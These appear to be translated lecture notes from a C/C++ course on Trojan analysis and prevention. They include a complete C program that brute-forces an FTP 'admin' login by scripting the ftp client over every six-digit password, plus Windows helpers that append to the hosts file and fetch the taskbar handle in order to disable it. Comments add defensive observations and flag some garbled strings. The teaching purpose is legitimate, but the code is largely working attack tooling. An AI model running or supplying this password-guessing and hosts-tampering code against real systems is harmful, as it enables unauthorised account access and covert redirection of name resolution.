Hacker code Analysis and Prevention notes
"Course profile"
Apart from assembly, C++ is the programming language closest to the underlying machine. Today's mainstream operating systems such as Windows, Linux, iOS and Android are written in C++, so many viruses and Trojans are also implemented in C/S. The purpose of the course is to use the C language to reveal how Trojans and various remote-control software are implemented, and how to protect against them.
"Course knowledge points"
1. How Trojans intrude into a system;
2. Analysis of the key behaviours of a Trojan after it has intruded into the target host;
3. Trusted ports and port-scanning techniques;
4. Code-level implementation of remote control;
5. Use of the TCP and UDP protocols and firewall-traversal techniques in malicious code;
6. How 360 network security protection is implemented.
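#include <stdio.h>
#include <string.h>

/*
 * Script template handed to the command-line ftp client: one open line,
 * the user name, the password, then bye.
 * NOTE(review): the command and script strings in this listing are
 * reproduced as they appear on the page; the page extraction altered
 * spacing and letter case elsewhere in the listing, so check them against
 * the original course material before relying on them.
 */
#define CONTENT "open%s\nuser\n%s\n%s\nbye\n"

/*
 * Write the ftp client script for a single login attempt to A.txt.
 *
 * ip, user, passwd: values substituted into CONTENT.
 * Returns 0 if the file was written, -1 on any failure (NULL argument,
 * file cannot be opened, write or close error).
 */
int write_file(const char *ip, const char *user, const char *passwd)
{
    FILE *script;
    int rc = 0;

    if (!ip || !user || !passwd)
        return -1;

    script = fopen("A.txt", "w");
    if (!script)
        return -1; /* failure, -1 */

    /* Format straight into the stream: no fixed-size scratch buffer that
     * a long argument could overflow. */
    if (fprintf(script, CONTENT, ip, user, passwd) < 0)
        rc = -1;
    if (fclose(script) != 0)
        rc = -1;

    return rc; /* 0 if successful */
}

/*
 * Classroom demonstration of online password guessing against an FTP
 * account: for every six-digit numeric candidate it writes a client script,
 * runs the ftp client on it and looks for the FTP reply code 230
 * ("user logged in") in the client's output.
 *
 * What this looks like from the server side: every candidate is a separate
 * session and every miss is a failed login from the same source, so the
 * activity stands out in the FTP server log. Throttling or locking the
 * account after a few failures, and passwords that are not short digit
 * strings, make this loop impractical.
 */
int main()
{
    int i;

    /* Assume that the password is composed entirely of digits. */
    for (i = 0; i < 1000000; i++) {
        char pass[100] = {0};
        char line[1024];
        int logged_in = 0;
        FILE *client;

        sprintf(pass, "%06d", i); /* candidate formatted as a string */

        if (write_file("192.168.101.138", "admin", pass) != 0)
            continue;

        client = _popen("Ftp-n-s:a.txt", "r");
        if (!client)
            continue; /* client could not be started; nothing to read */

        /* Loop on the fgets() result instead of feof(), so a stale buffer
         * is never inspected after end of output. */
        while (fgets(line, sizeof line, client)) {
            /* Reply code 230 stands for a successful login. */
            if (strncmp(line, "230", 3) == 0) {
                logged_in = 1;
                break;
            }
        }
        _pclose(client); /* closed on every path, including success */

        if (logged_in) {
            printf("pass:%s\n", pass);
            return 0;
        }
    }
    return 0;
}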
Helper functions:
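// Lockmask.cpp : Defines the entry point for the application.
#include "stdafx.h"
#include "lockmask.h"

// Helper functions

/*
 * Changing the application icon
 *   VS: replace the <project name>.ico file.
 *   Qt: a. Find an .ico picture and rename it to myapp.ico.
 *       b. Create a text document myapp.rc containing
 *            IDI_ICON1 ICON DISCARDABLE "myapp.ico"
 *       c. Add RC_FILE=myapp.rc to myapp.pro and rebuild.
 */
/*
 * VS2013: building so the program does not depend on the runtime library
 * and is XP-compatible
 *   Project--Properties--Configuration Properties--General--Platform Toolset--Windows XP
 *   Project--Properties--Configuration Properties--C/C++--Code Generation--Runtime Library--Multithreaded (/MT)
 */
#include "stdafx.h"
#include <stdio.h>
#include <string.h>
#include <Windows.h>
#include <ShellAPI.h>
#pragma warning(disable:4996)

/*
 * Get the Windows version.
 * The result is only stored in a local structure; nothing is returned.
 */
void getwinversion()
{
    OSVERSIONINFO info;

    info.dwOSVersionInfoSize = sizeof(info);
    GetVersionEx(&info);
}

/*
 * Append one entry to the hosts file under the Windows system directory.
 *
 * ip, domain: written to the file in that order.
 * Returns 0 if the entry was written, -1 on failure.
 *
 * Entries in this file override name resolution on the local machine, and
 * writing to it normally requires administrator rights, so an unexpected
 * change to the file is worth alerting on (file-integrity monitoring).
 */
int sethosts(const char *ip, const char *domain)
{
    static const char suffix[] = "\\drivers\\etc\\hosts";
    char sysdir[MAX_PATH] = {0};
    char path[MAX_PATH + sizeof(suffix) + 1] = {0};
    UINT len;
    FILE *p;
    int rc = 0;

    if (!ip || !domain)
        return -1;

    /* Get the Windows system directory; 0 means failure and a value of at
     * least the buffer size means the path did not fit. */
    len = GetSystemDirectoryA(sysdir, sizeof(sysdir));
    if (len == 0 || len >= sizeof(sysdir))
        return -1;

    /* path is sized for sysdir + separator + suffix, so this cannot overflow. */
    sprintf(path, "%s\\%s", sysdir, suffix);

    p = fopen(path, "a"); /* open the hosts file for appending */
    if (!p)
        return -1;

    /* NOTE(review): the format string is reproduced as it appears on the
     * page, with nothing between the two fields; hosts entries are
     * whitespace-separated, so check it against the original listing. */
    if (fprintf(p, "%s%s", ip, domain) < 0)
        rc = -1;
    if (fclose(p) != 0)
        rc = -1;

    return rc;
}

/*
 * Get the taskbar window handle.
 * Returns NULL if user32 or the GetTaskmanWindow export cannot be resolved.
 */
HWND gettask()
{
    /* Function-pointer type for: HWND func(void) */
    typedef HWND (WINAPI *PROCGETTASKMANWND)(void);
    PROCGETTASKMANWND GetTaskmanWindow; /* function pointer variable */
    HMODULE hUser32;
    HWND h;

    hUser32 = GetModuleHandleA("user32"); /* reference the user32.dll library */
    if (!hUser32)
        return NULL;

    GetTaskmanWindow = (PROCGETTASKMANWND)GetProcAddress(hUser32, "GetTaskmanWindow");
    if (!GetTaskmanWindow)
        return NULL;

    h = GetTaskmanWindow();
    return GetParent(GetParent(h));
}

/*
 * Entry point: looks up the taskbar window and re-enables it.
 * The disabling call from the lesson is kept commented out, as on the page.
 */
int APIENTRY _tWinMain(_In_ HINSTANCE hInstance,
                       _In_opt_ HINSTANCE hPrevInstance,
                       _In_ LPTSTR lpCmdLine,
                       _In_ int nCmdShow)
{
    HWND h = gettask();

    if (!h)
        return 0; /* taskbar window not found; nothing to do */

    //EnableWindow(h, false); // set the taskbar to unavailable
    EnableWindow(h, true);    // set the taskbar to available
    return 0;
}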
Preach Intelligence Podcast C++ public lesson notes -- Hacker Code Analysis and Prevention